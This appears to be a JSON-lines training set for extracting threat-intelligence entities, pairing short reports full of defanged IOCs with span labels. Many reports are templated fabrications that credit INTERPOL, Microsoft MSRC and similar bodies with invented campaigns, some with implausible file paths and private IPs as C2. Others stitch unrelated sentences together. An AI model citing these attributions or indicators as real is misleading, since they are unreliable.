{"text": "IOC Bulletin - Meduza Stealer Campaign:\nNetwork Indicators:\n- 195 [ . ] 3 [ . ] 154 [ . ] 254\n- 10 [ . ] 213 [ . ] 26 [ . ] 76\n- 10 [ . ] 242 [ . ] 45 [ . ] 95\n- proxyedge[.]tech\n- api-cache[ . ]online\nURLs:\n- hxxps://portal-edge[ . ]site/collect\n- hxxps://api-gateway[.]com/admin/config\nEmail Senders:\n- admin@secure-verify[.]net\n- support@auth-check[ . ]org\nFile Indicators:\n- SHA1: 5a1ba9639e0aca120d7058eccbb078f1c04207e7\n- SHA256: ccc24be92f4312adb74e854f2efe2f66b9b8e983dd4bb852805e0d29aa2eedd6\n- Drop path: /etc/cron.d/dropper.ps1", "spans": {"Malware: Meduza Stealer": [[15, 29]], "Indicator: 195.3.154.254": [[62, 93]], "Indicator: 10.213.26.76": [[96, 126]], "Indicator: 10.242.45.95": [[129, 159]], "Indicator: proxyedge.tech": [[162, 178]], "Indicator: api-cache.online": [[181, 201]], "Indicator: hxxps://portal-edge.site/collect": [[210, 246]], "Indicator: https://api-gateway.com/admin/config": [[249, 287]], "Indicator: admin@secure-verify.net": [[305, 330]], "Indicator: support@auth-check.org": [[333, 359]], "Indicator: 5a1ba9639e0aca120d7058eccbb078f1c04207e7": [[385, 425]], "Indicator: ccc24be92f4312adb74e854f2efe2f66b9b8e983dd4bb852805e0d29aa2eedd6": [[436, 500]]}, "info": {"id": "synth_v2_01359", "source": "defanged_augment"}}
{"text": "Artifact Analysis for StealC campaign:\nStage 1 dropper at C:\\Users\\admin\\Downloads\\ntds.dit - SHA1: dd6808993c5c589f57a878f242e4525f93705d98\nStage 2 loader at /var/tmp/config.dat - MD5: a4b2192dfdce0207a01ff7433ab99424\nFinal payload at C:\\ProgramData\\loader.exe - MD5: 400c4608aa1abfa7cd3a44d46bfb4d23\nExfiltration module - MD5: 13c0df09d121beb4784e0c67b79284bc\nAll stages communicated with 26 [ . ] 31 [ . ] 177 [ . ] 196. Nmap signatures detected in Stage 2.", "spans": {"Malware: StealC": [[22, 28]], "Indicator: dd6808993c5c589f57a878f242e4525f93705d98": [[100, 140]], "Indicator: a4b2192dfdce0207a01ff7433ab99424": [[186, 218]], "Indicator: 400c4608aa1abfa7cd3a44d46bfb4d23": [[269, 301]], "Indicator: 13c0df09d121beb4784e0c67b79284bc": [[329, 361]], "Indicator: 26.31.177.196": [[391, 422]]}, "info": {"id": "synth_v2_01933", "source": "defanged_augment"}}
{"text": "TensorFlow is an end-to-end open source platform for machine learning. In affected versions an attacker can trigger a read from outside of bounds of heap allocated data by sending invalid arguments to `tf.raw_ops.ResourceScatterUpdate`. The [implementation](hxxps://github[.]com/tensorflow/tensorflow/blob/f24faa153ad31a4b51578f8181d3aaab77a1ddeb/tensorflow/core/kernels/resource_variable_ops.cc#L919-L923) has an incomplete validation of the relationship between the shapes of `indices` and `updates`: instead of checking that the shape of `indices` is a prefix of the shape of `updates` (so that broadcasting can happen), code only checks that the number of elements in these two tensors are in a divisibility relationship. We have patched the issue in GitHub commit 01cff3f986259d661103412a20745928c727326f. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.", "spans": {"Indicator: https://github.com/tensorflow/tensorflow/blob/f24faa153ad31a4b51578f8181d3aaab77a1ddeb/tensorflow/core/kernels/resource_variable_ops.cc#L919-L923": [[258, 405]], "Indicator: 01cff3f986259d661103412a20745928c727326f": [[769, 809]], "Organization: GitHub": [[755, 761]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-37655"}}
{"text": "INTERPOL published a threat intelligence report linking Diamond Sleet to a new campaign exploiting CVE-2022-47837 in Cisco ASA. The attackers deployed BumbleBee via WinPEAS, establishing C2 communication with 192[.]164[.]144[.]98 and nodeproxy[.]online. A secondary payload was downloaded from hxxp://proxy-storage[.]dev/secure/token. The malware binary (MD5: 022c81682909faba6eec771009ea0cb5) was dropped to C:\\Program Files\\Common Files\\update.dll. Phishing emails were sent from notification@login-portal[ . ]tech targeting enterprise users. A backup C2 server was identified at 137 [ . ] 183 [ . ] 157 [ . ] 67.", "spans": {"Organization: INTERPOL": [[0, 8]], "Vulnerability: CVE-2022-47837": [[99, 113]], "System: Cisco ASA": [[117, 126]], "Malware: BumbleBee": [[151, 160]], "Indicator: 192.164.144.98": [[209, 229]], "Indicator: nodeproxy.online": [[234, 252]], "Indicator: hxxp://proxy-storage.dev/secure/token": [[294, 333]], "Indicator: 022c81682909faba6eec771009ea0cb5": [[360, 392]], "Indicator: notification@login-portal.tech": [[482, 516]], "Indicator: 137.183.157.67": [[582, 614]]}, "info": {"id": "synth_v2_00080", "source": "defanged_augment"}}
{"text": "Zscaler ThreatLabz published a threat intelligence report linking Volt Typhoon to a new campaign exploiting CVE-2025-48311 in Fortinet FortiGate. The attackers deployed NjRAT via PowerView, establishing C2 communication with 33 [ . ] 13 [ . ] 201 [ . ] 152 and securecdn[ . ]info. A secondary payload was downloaded from hxxps://storagecloud[.]online/secure/token. The malware binary (MD5: 40a194b4d4cb5d64805d497691b575e3) was dropped to /usr/local/bin/ntds.dit. Phishing emails were sent from hr@secure-verify[.]net targeting enterprise users. A backup C2 server was identified at 10 [ . ] 219 [ . ] 69 [ . ] 222.", "spans": {"Organization: Zscaler ThreatLabz": [[0, 18]], "Vulnerability: CVE-2025-48311": [[108, 122]], "System: Fortinet FortiGate": [[126, 144]], "Malware: NjRAT": [[169, 174]], "Indicator: 33.13.201.152": [[225, 256]], "Indicator: securecdn.info": [[261, 279]], "Indicator: https://storagecloud.online/secure/token": [[321, 363]], "Indicator: 40a194b4d4cb5d64805d497691b575e3": [[390, 422]], "Indicator: hr@secure-verify.net": [[495, 517]], "Indicator: 10.219.69.222": [[583, 614]]}, "info": {"id": "synth_v2_00016", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Sophos X-Ops identified a large-scale phishing operation. Emails originated from admin@document-share[.]link and notification@identity-verify[ . ]cc, spoofing legitimate services. Victims were directed to hxxp://auth-edge[.]dev/callback which hosted a credential harvesting page on gatewayapi[ . ]com. A secondary link hxxp://relayrelay[ . ]net/callback delivered BlackCat (SHA1: fc7a98ac71a83bff54b4cdedbbe647e9fc615c69). The malware was saved to C:\\Users\\admin\\Desktop\\helper.sh and established C2 with 45[.]16[.]68[.]204.", "spans": {"Organization: Sophos X-Ops": [[26, 38]], "Indicator: admin@document-share.link": [[107, 134]], "Indicator: notification@identity-verify.cc": [[139, 174]], "Indicator: hxxp://auth-edge.dev/callback": [[231, 262]], "Indicator: gatewayapi.com": [[308, 326]], "Indicator: http://relayrelay.net/callback": [[345, 379]], "Malware: BlackCat": [[390, 398]], "Indicator: fc7a98ac71a83bff54b4cdedbbe647e9fc615c69": [[406, 446]], "Indicator: 45.16.68.204": [[531, 549]]}, "info": {"id": "synth_v2_01031", "source": "defanged_augment"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Ligolo artifacts at /opt/app/bin/csrss.exe. Memory dump analysis confirmed execution of Rubeus. Registry modifications pointed to persistence via C:\\Users\\admin\\Downloads\\helper.sh. Network forensics identified connections to 172[.]98[.]233[.]166 and cdnbackup[.]online. Email headers traced the initial vector to ceo@login-portal[.]tech. File C:\\Users\\admin\\Downloads\\payload.bin (SHA1: 21bb4dcaf516182cad3981db9bb87cb1f7f5e166) was identified as the initial dropper. A staging URL hxxps://cdnauth[ . ]net/secure/token resolved to 163 [ . ] 155 [ . ] 120 [ . ] 90. Secondary artifact hash: SHA1: 13618451d5c53e92871c56707c861acb5e3a91dd.", "spans": {"Indicator: 172.98.233.166": [[298, 318]], "Indicator: cdnbackup.online": [[323, 341]], "Indicator: ceo@login-portal.tech": [[386, 409]], "Indicator: 21bb4dcaf516182cad3981db9bb87cb1f7f5e166": [[460, 500]], "Indicator: hxxps://cdnauth.net/secure/token": [[555, 591]], "Indicator: 163.155.120.90": [[604, 636]], "Indicator: 13618451d5c53e92871c56707c861acb5e3a91dd": [[669, 709]]}, "info": {"id": "synth_v2_01253", "source": "defanged_augment"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Covenant artifacts at /home/user/.config/csrss.exe. Memory dump analysis confirmed execution of CrackMapExec. Registry modifications pointed to persistence via /etc/cron.d/winlogon.exe. Network forensics identified connections to 35[.]242[.]95[.]140 and syncportal[ . ]net. Email headers traced the initial vector to info@auth-check[.]org. File /var/tmp/sam.hive (SHA1: 1076081d3c86a6b206b8fdd633df129e93b8446d) was identified as the initial dropper. A staging URL hxxp://mailgateway[ . ]club/callback resolved to 172 [ . ] 233 [ . ] 102 [ . ] 64. Secondary artifact hash: SHA256: c4ce8f71359818bf567a3623886bf75a36678f4055a693531481182d6ea4900e.", "spans": {"Indicator: 35.242.95.140": [[302, 321]], "Indicator: syncportal.net": [[326, 344]], "Indicator: info@auth-check.org": [[389, 410]], "Indicator: 1076081d3c86a6b206b8fdd633df129e93b8446d": [[442, 482]], "Indicator: hxxp://mailgateway.club/callback": [[537, 573]], "Indicator: 172.233.102.64": [[586, 618]], "Indicator: c4ce8f71359818bf567a3623886bf75a36678f4055a693531481182d6ea4900e": [[653, 717]]}, "info": {"id": "synth_v2_01111", "source": "defanged_augment"}}
{"text": "TensorFlow is an end-to-end open source platform for machine learning. An attacker can trigger a denial of service via a `CHECK`-fail in `tf.raw_ops.SparseConcat`. This is because the implementation(hxxps://github[.]com/tensorflow/tensorflow/blob/b432a38fe0e1b4b904a6c222cbce794c39703e87/tensorflow/core/kernels/sparse_concat_op.cc#L76) takes the values specified in `shapes[0]` as dimensions for the output shape. The `TensorShape` constructor(hxxps://github[.]com/tensorflow/tensorflow/blob/6f9896890c4c703ae0a0845394086e2e1e523299/tensorflow/core/framework/tensor_shape.cc#L183-L188) uses a `CHECK` operation which triggers when `InitDims`(hxxps://github[ . ]com/tensorflow/tensorflow/blob/6f9896890c4c703ae0a0845394086e2e1e523299/tensorflow/core/framework/tensor_shape.cc#L212-L296) returns a non-OK status. This is a legacy implementation of the constructor and operations should use `BuildTensorShapeBase` or `AddDimWithStatus` to prevent `CHECK`-failures in the presence of overflows. The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.", "spans": {"Indicator: https://github.com/tensorflow/tensorflow/blob/b432a38fe0e1b4b904a6c222cbce794c39703e87/tensorflow/core/kernels/sparse_concat_op.cc#L76": [[199, 335]], "Indicator: https://github.com/tensorflow/tensorflow/blob/6f9896890c4c703ae0a0845394086e2e1e523299/tensorflow/core/framework/tensor_shape.cc#L183-L188": [[445, 585]], "Indicator: https://github.com/tensorflow/tensorflow/blob/6f9896890c4c703ae0a0845394086e2e1e523299/tensorflow/core/framework/tensor_shape.cc#L212-L296": [[643, 785]], "Vulnerability: denial of service": [[97, 114]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-29534"}}
{"text": "A backdoor also known as: Backdoor.Protux Backdoor/Protux.wz Trojan.Win32.Protux.pdpbh Backdoor.Trojan Protux.AO Backdoor[.]Win32[.]Protux[.]ws Backdoor.Protux!x0RB0sLZXQU Win32.HLLW.Autoruner1.4496 BDS/Protux[.]ws Heuristic.BehavesLike.Win32.Backdoor.H Backdoor/Protux.ht Win32.Troj.Undef.kcloud Backdoor.Win32.A.Protux.102400.A Backdoor/Win32.Trojan Backdoor.Protux Backdoor.Trojan Backdoor.Win32.Protux W32/Protux[.]WS!tr.bdr Trj/CI.A", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Backdoor.Win32.Protux.ws": [[113, 143]], "Indicator: Protux.ws": [[203, 214]], "Indicator: Protux.WS": [[410, 421]]}, "info": {"id": "cyner2_train_005721", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: StealC (MD5: d1d73e5ff5a3db1b6a39937ab37c527d). Upon execution on Citrix NetScaler, the sample creates C:\\Users\\admin\\Downloads\\agent.py and injects into legitimate processes. Network analysis shows beaconing to 77[.]20[.]119[.]196 every 60 seconds and DNS queries to gateway-gateway[.]link. The second stage was fetched from hxxps://cacheportal[ . ]cc/download/update.exe and written to /tmp/shell.php. The payload uses Seatbelt-style techniques for defense evasion. A secondary hash (MD5: 7b2be7b513142692a3102cb45f962bdb) was extracted from the unpacked payload.", "spans": {"Malware: StealC": [[25, 31]], "Indicator: d1d73e5ff5a3db1b6a39937ab37c527d": [[38, 70]], "System: Citrix NetScaler": [[91, 107]], "Indicator: 77.20.119.196": [[237, 256]], "Indicator: gateway-gateway.link": [[293, 315]], "Indicator: hxxps://cacheportal.cc/download/update.exe": [[351, 397]], "Indicator: 7b2be7b513142692a3102cb45f962bdb": [[516, 548]]}, "info": {"id": "synth_v2_00454", "source": "defanged_augment"}}
{"text": "This High severity Remote Code Execution (RCE) vulnerability was introduced in version 7.13.0 of Confluence Data Center and Server.\n\nRemote Code Execution (RCE) vulnerability, with a CVSS Score of 8.6 and a CVSS Vector of CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N allows an unauthenticated attacker to expose assets in your environment susceptible to exploitation which has high impact to confidentiality, no impact to integrity, no impact to availability, and does not require user interaction.\n\nAtlassian recommends that Confluence Data Center and Server customers upgrade to latest version, if you are unable to do so, upgrade your instance to one of the specified supported fixed versions:\n\n* Confluence Data Center and Server 7.19: Upgrade to a release 7.19.18, or any higher 7.19.x release\n* Confluence Data Center and Server 8.5: Upgrade to a release 8.5.5 or any higher 8.5.x release\n* Confluence Data Center and Server 8.7: Upgrade to a release 8.7.2 or any higher release\n\nSee the release notes (hxxps://confluence[ . ]atlassian[ . ]com/doc/confluence-release-notes-327.html ). You can download the latest version of Confluence Data Center and Server from the download center (hxxps://www[ . ]atlassian[ . ]com/software/confluence/download-archives ).", "spans": {"Indicator: https://confluence.atlassian.com/doc/confluence-release-notes-327.html": [[1009, 1087]], "Indicator: https://www.atlassian.com/software/confluence/download-archives": [[1190, 1261]], "Organization: Atlassian": [[500, 509]], "Vulnerability: Remote Code Execution": [[19, 40], [133, 154]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2024-21674"}}
{"text": "Backdoor[ . ]Zekapab is installed on selected infected computers and is capable of taking screenshots , executing files and commands , uploading and downloading files , performing registry and file system operations , and carrying out system information tasks .", "spans": {"Indicator: Backdoor.Zekapab": [[0, 20]]}, "info": {"id": "cyberner_stix_train_006277", "source": "defanged_augment"}}
{"text": "HummingBad does this by silently installing promoted apps on infected phones , defrauding legitimate mobile advertisers , and creating fraudulent statistics inside the official Google Play Store . We also recently discovered that Lazarus successfully planted their backdoor ( detected by Trend Micro as BKDR_BINLODR.ZNFJ-A ) into several machines of financial institutions across Latin America . APT33 : 37 [ . ] 48 [ . ] 105 [ . ] 178 servhost[.]hopto[.]org . Others include Excel spreadsheets that contain socially engineered instructions on how to enable macros in Excel so that the malicious VBA code can be executed .", "spans": {"Malware: HummingBad": [[0, 10]], "System: Google Play Store": [[177, 194]], "Organization: Trend Micro": [[288, 299]], "Organization: financial institutions": [[350, 372]], "Indicator: 37.48.105.178": [[404, 435]], "Indicator: servhost.hopto.org": [[436, 458]]}, "info": {"id": "cyberner_stix_train_003623", "source": "defanged_augment"}}
{"text": "IoCs C & C 100[.]51[.]100[.]00 108[.]62[.]118[.]131 172[.]81[.]134[.]165 172[.]86[.]120[.]207 185 [ . ] 212 [ . ] 128 [ . ] 152 185[.]212[.]128[.]192 185 [ . ] 61 [ . ] 000 [ . ] 108 185 [ . ] 61 [ . ] 138 [ . ] 108 185 [ . ] 61 [ . ] 138 [ . ] 37 188[.]209[.]52[.]101 5 [ . ] 206 [ . ] 225 [ . ] 57 alr992.date avito-app[.]pw backfround2[.]pw background1[ . ]xyz blacksolider93[ . ]com blass9g087[ . ]com brekelter2[ . ]com broplar3hf[.]xyz buy-youla[.]ru cd78cg210xy0[.]com copsoiteess[ . ]com farmatefc93[.]org firstclinsop[.]com holebrhuhh3[.]com holebrhuhh45[.]com karambga3j[.]net le22999a[ . ]pw leboncoin-bk[.]top leboncoin-buy[.]pw leboncoin-cz[.]info leboncoin-f[ . ]pw leboncoin-jp[ . ]info leboncoin-kp[.]top leboncoin-ny[.]info leboncoin-ql[.]top leboncoin-tr[ . ]info myyoula[.]ru sell-avito[.]ru sell-youla[ . ]ru sentel8ju67[.]com subito-li[ . ]pw subitop[ . ]pw web-gumtree[.]com whitehousejosh[.]com whitekalgoy3[ . ]com youlaprotect[ . ]ru Examples of malware 0497b6000a7a23e9e9b97472bc2d3799caf49cbbea1627ad4d87ae6e0b7e2a98 417fc112cd0610cc8c402742b0baab0a086b5c4164230009e11d34fdeee7d3fa 54594edbe9055517da2836199600f682dee07e6b405c6fe4b476627e8d184bfe 6e995d68c724f121d43ec2ff59bc4e536192360afa3beaec5646f01094f0b745 bbc268ca63eeb27e424fec1b3976bab550da304de18e29faff94d9057b1fa25a dc3dd9d75120934333496d0a4100252b419ee8fcdab5d74cf343bcb0306c9811 e3f77ff093f322e139940b33994c5a57ae010b66668668dc4945142a81bcc049 ebd0a8043434edac261cb25b94f417188a5c0d62b5dd4033f156b890d150a4c5 f51a27163cb0ddd08caa29d865b9f238848118ba2589626af711330481b352df Tracking down the developer of Android adware affecting millions of users 24 Oct 2019 - 11:30AM We detected a large adware campaign running for about a year , with the involved apps installed eight million times from Google Play alone .", "spans": {"System: Android": [[1595, 1602]], "System: Google Play": [[1781, 1792]], "Indicator: 0497b6000a7a23e9e9b97472bc2d3799caf49cbbea1627ad4d87ae6e0b7e2a98": [[979, 1043]], "Indicator: 417fc112cd0610cc8c402742b0baab0a086b5c4164230009e11d34fdeee7d3fa": [[1044, 1108]], "Indicator: 54594edbe9055517da2836199600f682dee07e6b405c6fe4b476627e8d184bfe": [[1109, 1173]], "Indicator: 6e995d68c724f121d43ec2ff59bc4e536192360afa3beaec5646f01094f0b745": [[1174, 1238]], "Indicator: bbc268ca63eeb27e424fec1b3976bab550da304de18e29faff94d9057b1fa25a": [[1239, 1303]], "Indicator: dc3dd9d75120934333496d0a4100252b419ee8fcdab5d74cf343bcb0306c9811": [[1304, 1368]], "Indicator: e3f77ff093f322e139940b33994c5a57ae010b66668668dc4945142a81bcc049": [[1369, 1433]], "Indicator: ebd0a8043434edac261cb25b94f417188a5c0d62b5dd4033f156b890d150a4c5": [[1434, 1498]], "Indicator: f51a27163cb0ddd08caa29d865b9f238848118ba2589626af711330481b352df": [[1499, 1563]], "Indicator: 100.51.100.00": [[11, 30]], "Indicator: 108.62.118.131": [[31, 51]], "Indicator: 172.81.134.165": [[52, 72]], "Indicator: 172.86.120.207": [[73, 93]], "Indicator: 185.212.128.152": [[94, 127]], "Indicator: 185.212.128.192": [[128, 149]], "Indicator: 185.61.000.108": [[150, 182]], "Indicator: 185.61.138.108": [[183, 215]], "Indicator: 185.61.138.37": [[216, 247]], "Indicator: 188.209.52.101": [[248, 268]], "Indicator: 5.206.225.57": [[269, 299]], "Indicator: avito-app.pw": [[312, 326]], "Indicator: backfround2.pw": [[327, 343]], "Indicator: background1.xyz": [[344, 363]], "Indicator: blacksolider93.com": [[364, 386]], "Indicator: blass9g087.com": [[387, 405]], "Indicator: brekelter2.com": [[406, 424]], "Indicator: broplar3hf.xyz": [[425, 441]], "Indicator: buy-youla.ru": [[442, 456]], "Indicator: cd78cg210xy0.com": [[457, 475]], "Indicator: copsoiteess.com": [[476, 495]], "Indicator: farmatefc93.org": [[496, 513]], "Indicator: firstclinsop.com": [[514, 532]], "Indicator: holebrhuhh3.com": [[533, 550]], "Indicator: holebrhuhh45.com": [[551, 569]], "Indicator: karambga3j.net": [[570, 586]], "Indicator: le22999a.pw": [[587, 602]], "Indicator: leboncoin-bk.top": [[603, 621]], "Indicator: leboncoin-buy.pw": [[622, 640]], "Indicator: leboncoin-cz.info": [[641, 660]], "Indicator: leboncoin-f.pw": [[661, 679]], "Indicator: leboncoin-jp.info": [[680, 701]], "Indicator: leboncoin-kp.top": [[702, 720]], "Indicator: leboncoin-ny.info": [[721, 740]], "Indicator: leboncoin-ql.top": [[741, 759]], "Indicator: leboncoin-tr.info": [[760, 781]], "Indicator: myyoula.ru": [[782, 794]], "Indicator: sell-avito.ru": [[795, 810]], "Indicator: sell-youla.ru": [[811, 828]], "Indicator: sentel8ju67.com": [[829, 846]], "Indicator: subito-li.pw": [[847, 863]], "Indicator: subitop.pw": [[864, 878]], "Indicator: web-gumtree.com": [[879, 896]], "Indicator: whitehousejosh.com": [[897, 917]], "Indicator: whitekalgoy3.com": [[918, 938]], "Indicator: youlaprotect.ru": [[939, 958]]}, "info": {"id": "cyner2_train_000517", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Volexity identified a large-scale phishing operation. Emails originated from support@login-portal[ . ]tech and security@phishing-domain[ . ]com, spoofing legitimate services. Victims were directed to hxxps://auth-static[.]online/api/v2/auth which hosted a credential harvesting page on authdata[ . ]net. A secondary link hxxp://sync-cdn[.]com/portal/verify delivered Qbot (SHA256: d0b5484a1aaddea8fa4a6fca035c1e996bd14e1021c62ac152cd24e41daf0fc2). The malware was saved to C:\\Windows\\Tasks\\dropper.ps1 and established C2 with 12 [ . ] 53 [ . ] 198 [ . ] 227.", "spans": {"Organization: Volexity": [[26, 34]], "Indicator: support@login-portal.tech": [[103, 132]], "Indicator: security@phishing-domain.com": [[137, 169]], "Indicator: hxxps://auth-static.online/api/v2/auth": [[226, 266]], "Indicator: authdata.net": [[312, 328]], "Indicator: hxxp://sync-cdn.com/portal/verify": [[347, 382]], "Malware: Qbot": [[393, 397]], "Indicator: d0b5484a1aaddea8fa4a6fca035c1e996bd14e1021c62ac152cd24e41daf0fc2": [[407, 471]], "Indicator: 12.53.198.227": [[552, 583]]}, "info": {"id": "synth_v2_00926", "source": "defanged_augment"}}
{"text": "While not too seriously , these elements made us restrict our research into surveillance companies from the region . Ongoing activity from attack groups like TA459 who consistently target individuals specializing in particular areas of research and expertise further complicate an already difficult security situation for organizations dealing with more traditional malware threats , phishing campaigns , and socially engineered threats every day . hxxp://linda-callaghan[ . ]icu/Minkowski/brown . Check the memory size with to check if it is less than 2 GB .", "spans": {"Indicator: http://linda-callaghan.icu/Minkowski/brown": [[449, 495]]}, "info": {"id": "cyberner_stix_train_005465", "source": "defanged_augment"}}
{"text": "Here is a list of broadcast actions : android.provider.Telephony.SMS_RECEIVED android.net.conn.CONNECTIVITY_CHANGE android.intent.action.BATTERY_CHANGED android.intent.action.USER_PRESENT android.intent.action.PHONE_STATE android.net.wifi.SCAN_RESULTS android.intent.action.PACKAGE_ADDED android.intent.action.PACKAGE_REMOVED android.intent.action.SCREEN_OFF android.intent.action.SCREEN_ON Furthermore , it has similar code logic as previous ones wuaupdt.exe in this attack appears in previous Donot attack , and C2 addresses are same to previous ones . Another time , the execution flow moves from “ exit[.]exe to “ i[.]cmd ” .", "spans": {"Malware: wuaupdt.exe": [[448, 459]], "Indicator: exit.exe": [[602, 612]], "Indicator: i.cmd": [[618, 625]]}, "info": {"id": "cyberner_stix_train_002072", "source": "defanged_augment"}}
{"text": "Mozilla ( Windows NT 6.1 ; WOW64 ) WinHttp/1 [ . ] 6 [ . ] 3 [ . ] 8 ( WinHTTP/5.1 ) like Gecko .", "spans": {"Organization: Mozilla": [[0, 7]], "System: Windows": [[10, 17]], "Indicator: 1.6.3.8": [[43, 68]]}, "info": {"id": "cyberner_stix_train_002543", "source": "defanged_augment"}}
{"text": "Blog Post by Microsoft MSRC: Tracking Turla's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2020-12082 against Barracuda ESG deployments. The initial access vector involves spear-phishing emails from finance@secure-verify[ . ]net delivering RemcosRAT. Post-compromise, the attackers deploy SystemBC and use Chisel for reconnaissance. C2 infrastructure includes 172 [ . ] 137 [ . ] 9 [ . ] 157 and edgerelay[.]live. A staging server at hxxps://edge-proxy[.]dev/panel/index.html hosts additional tooling. Key artifact: C:\\Users\\admin\\AppData\\Local\\Temp\\update.dll (SHA256: e4ab9121a66e99979e9de02f743313edf9e3d938561aa8f803b4afe58fc0db4a).", "spans": {"Organization: Microsoft MSRC": [[13, 27]], "Vulnerability: CVE-2020-12082": [[123, 137]], "System: Barracuda ESG": [[146, 159]], "Indicator: finance@secure-verify.net": [[235, 264]], "Malware: RemcosRAT": [[276, 285]], "Malware: SystemBC": [[325, 333]], "Indicator: 172.137.9.157": [[396, 427]], "Indicator: edgerelay.live": [[432, 448]], "Indicator: hxxps://edge-proxy.dev/panel/index.html": [[470, 511]], "Indicator: e4ab9121a66e99979e9de02f743313edf9e3d938561aa8f803b4afe58fc0db4a": [[606, 670]]}, "info": {"id": "synth_v2_01646", "source": "defanged_augment"}}
{"text": "When presented with TG-4127 's spoofed login page , victims might be convinced it was the legitimate login page for their hillaryclinton[.]com email account .", "spans": {"Indicator: hillaryclinton.com": [[122, 142]]}, "info": {"id": "cyberner_stix_train_005351", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Trojan-Dropper.Win32.Typic!O Downldr.TonickCS.S543700 Dropper.Typic.Win32.736 Trojan/Dropper.Typic.arx Win32.Trojan-Downloader.VB.p Win32/Fruspam.GF Win.Trojan.Typic-1 Trojan-Downloader.Win32.Dapato.stb Trojan.Win32.Typic.dvexc TrojWare.Win32.TrojanDownloader.VB.OSNA TrojanDropper[.]Typic[.]me Trojan[Dropper]/Win32.Typic Dropper/Win32.Typic.R2031 TrojanDownloader.VB Trojan.Downloader.WCA Win32/TrojanDownloader.VB.OSN Trojan.DR.Typic!OCnhzJxHb3A Backdoor.Win32.Bifrose Trj/Downloader.XOR", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: TrojanDropper.Typic.me": [[294, 320]]}, "info": {"id": "cyner2_train_005741", "source": "defanged_augment"}}
{"text": "Blog Post by INTERPOL: Tracking Gamaredon's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2022-29213 against VMware ESXi deployments. The initial access vector involves spear-phishing emails from account@mail-service[.]info delivering SystemBC. Post-compromise, the attackers deploy SmokeLoader and use PsExec for reconnaissance. C2 infrastructure includes 140 [ . ] 81 [ . ] 230 [ . ] 58 and mail-static[ . ]online. A staging server at hxxps://gatewaylogin[ . ]com/login hosts additional tooling. Key artifact: C:\\Users\\admin\\Desktop\\backdoor.elf (MD5: aa702e8872edff1b78f3331d13251604).", "spans": {"Organization: INTERPOL": [[13, 21]], "Vulnerability: CVE-2022-29213": [[121, 135]], "System: VMware ESXi": [[144, 155]], "Indicator: account@mail-service.info": [[231, 258]], "Malware: SystemBC": [[270, 278]], "Malware: SmokeLoader": [[318, 329]], "Indicator: 140.81.230.58": [[392, 423]], "Indicator: mail-static.online": [[428, 450]], "Indicator: https://gatewaylogin.com/login": [[472, 506]], "Indicator: aa702e8872edff1b78f3331d13251604": [[589, 621]]}, "info": {"id": "synth_v2_01664", "source": "defanged_augment"}}
{"text": "The message translates roughly to “ You got a photo in MMS format : hxxp : //yyyyyyyy[ . ]XXXX[ . ]ru/mms.apk. ” So far we identified seven different URLs being used to spread RuMMS in the wild . Attackers using several locations in China have leveraged C&C servers on purchased hosted services in the United States and compromised servers in the Netherlands to wage attacks against global oil , gas , and petrochemical companies , as well as individuals and executives in Kazakhstan , Taiwan , Greece , and the United States to acquire proprietary and highly confidential information . The fact that the “ 28847[ . ]exe ” file can be opened makes us understand that the “ 28847 ” file is another SFX file . LotLBin techniques also make it difficult for defenders to detect threat activity as they need to not only remain vigilant for new files introduced to their environments , but also for modifications to files already present within their installed OT applications and services .", "spans": {"Malware: RuMMS": [[176, 181]], "Organization: oil": [[390, 393]], "Organization: gas": [[396, 399]], "Organization: petrochemical companies": [[406, 429]], "Organization: executives": [[459, 469]], "Indicator: 28847.exe": [[607, 620]], "Indicator: 28847": [[672, 677]], "System: OT applications": [[952, 967]], "Indicator: yyyyyyyy.XXXX.ru": [[77, 101]]}, "info": {"id": "cyberner_stix_train_005420", "source": "defanged_augment"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Seatbelt artifacts at C:\\Program Files\\Common Files\\update.dll. Memory dump analysis confirmed execution of WinPEAS. Registry modifications pointed to persistence via C:\\Windows\\Temp\\update.dll. Network forensics identified connections to 179 [ . ] 181 [ . ] 247 [ . ] 59 and portal-portal[.]club. Email headers traced the initial vector to noreply@account-update[ . ]xyz. File /home/user/.config/svchost.exe (SHA1: ea1770a8c791419e9d4ba854f93baa64f7efa0a5) was identified as the initial dropper. A staging URL hxxps://syncstatic[ . ]org/wp-content/uploads/doc.php resolved to 107 [ . ] 65 [ . ] 147 [ . ] 226. Secondary artifact hash: SHA256: 2ce7e92bf743efdf5b75af69d3c02dc00c72d155ca0e3776240d734335db3389.", "spans": {"Indicator: 179.181.247.59": [[311, 343]], "Indicator: portal-portal.club": [[348, 368]], "Indicator: noreply@account-update.xyz": [[413, 443]], "Indicator: ea1770a8c791419e9d4ba854f93baa64f7efa0a5": [[488, 528]], "Indicator: hxxps://syncstatic.org/wp-content/uploads/doc.php": [[583, 636]], "Indicator: 107.65.147.226": [[649, 681]], "Indicator: 2ce7e92bf743efdf5b75af69d3c02dc00c72d155ca0e3776240d734335db3389": [[716, 780]]}, "info": {"id": "synth_v2_01208", "source": "defanged_augment"}}
